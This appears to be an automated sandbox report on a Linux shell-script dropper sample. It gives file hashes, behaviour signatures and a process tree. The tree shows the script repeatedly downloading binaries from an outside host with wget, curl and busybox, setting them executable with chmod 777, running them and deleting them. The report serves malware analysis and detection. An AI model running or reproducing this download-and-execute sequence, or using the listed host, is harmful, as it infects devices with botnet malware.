Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-11-2024 04:04
Static task
static1
Behavioral task
behavioral1
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
-
Size
10KB
-
MD5
b5f00b34167fe96b81dc9665e6270fa1
-
SHA1
85c7e0bcb2347c19116b2c25edec820fb146b6d0
-
SHA256
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b
-
SHA512
7b946d54011a2a0dab5d02d954062d55468a624a8efa18baba4d31e0c99bfba3592a845cf51555e4ffa0078bcb1aa5f3aa7bacd25f492cfdc17793d6c6c0bdbf
-
SSDEEP
192:SBfFdewQdKWQGeqVwYjPmOhkwkpzmOhkwEfAwQdKW6aeqVwYU:SBfFdewQdKWzPmOhkwkpzmOhkwEfAwQO
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 876 chmod 897 chmod 905 chmod 920 chmod 942 chmod 957 chmod 769 chmod 815 chmod 980 chmod 995 chmod 964 chmod 972 chmod 795 chmod 823 chmod 883 chmod 890 chmod 927 chmod 738 chmod 745 chmod 868 chmod 949 chmod 934 chmod 988 chmod 1003 chmod 830 chmod 913 chmod -
Executes dropped EXE 26 IoCs
ioc pid Process /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc 739 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i 746 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X 771 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK 797 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m 816 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb 824 200cUyejdGjWDM9heC9D1Qq26iolWznBRb /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 831 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX 869 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX /tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA 877 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA /tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz 884 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp 891 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz 898 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 906 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd 914 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp 921 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz 928 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 935 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd 943 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc 950 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i 958 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X 965 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK 973 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m 981 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb 989 200cUyejdGjWDM9heC9D1Qq26iolWznBRb /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 996 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX 1004 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 822 busybox 879 wget 910 curl 919 busybox 938 wget 969 curl 923 wget 1000 curl 1006 wget 834 wget 961 curl 894 curl 714 wget 720 curl 737 busybox 744 busybox 765 busybox 791 busybox 811 curl 931 curl 987 busybox 991 wget 826 wget 827 curl 873 curl 917 curl 979 busybox 820 curl 829 busybox 886 wget 941 busybox 954 curl 882 busybox 953 wget 976 wget 992 curl 814 busybox 872 wget 939 curl 875 busybox 909 wget 945 wget 971 busybox 984 wget 839 curl 880 curl 889 busybox 916 wget 960 wget 775 wget 782 curl 896 busybox 902 curl 956 busybox 994 busybox 819 wget 901 wget 912 busybox 924 curl 963 busybox 1007 curl 749 wget 804 wget 887 curl -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz curl File opened for modification /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb curl File opened for modification /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X curl File opened for modification /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX curl File opened for modification /tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz curl File opened for modification /tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA curl File opened for modification /tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz curl File opened for modification /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc curl File opened for modification /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i curl File opened for modification /tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X curl File opened for modification /tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc curl File opened for modification /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m curl File opened for modification /tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb curl File opened for modification /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK curl File opened for modification /tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m curl File opened for modification /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 curl File opened for modification /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd curl File opened for modification /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 curl File opened for modification /tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2 curl File opened for modification /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp curl File opened for modification /tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1 curl File opened for modification /tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp curl File opened for modification /tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX curl File opened for modification /tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i curl File opened for modification /tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK curl File opened for modification /tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd curl
Processes
-
/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh1⤵PID:705
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:714
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵PID:741
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:744
-
-
/bin/chmodchmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:765
-
-
/bin/chmodchmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵PID:774
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:775
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:804
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:814
-
-
/bin/chmodchmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:818
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:819
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:822
-
-
/bin/chmodchmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb./200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:826
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/chmodchmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵PID:833
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:834
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:865
-
-
/bin/chmodchmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:904
-
-
/bin/chmodchmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:926
-
-
/bin/chmodchmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:933
-
-
/bin/chmodchmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:941
-
-
/bin/chmodchmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:948
-
-
/bin/chmodchmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:953
-
-
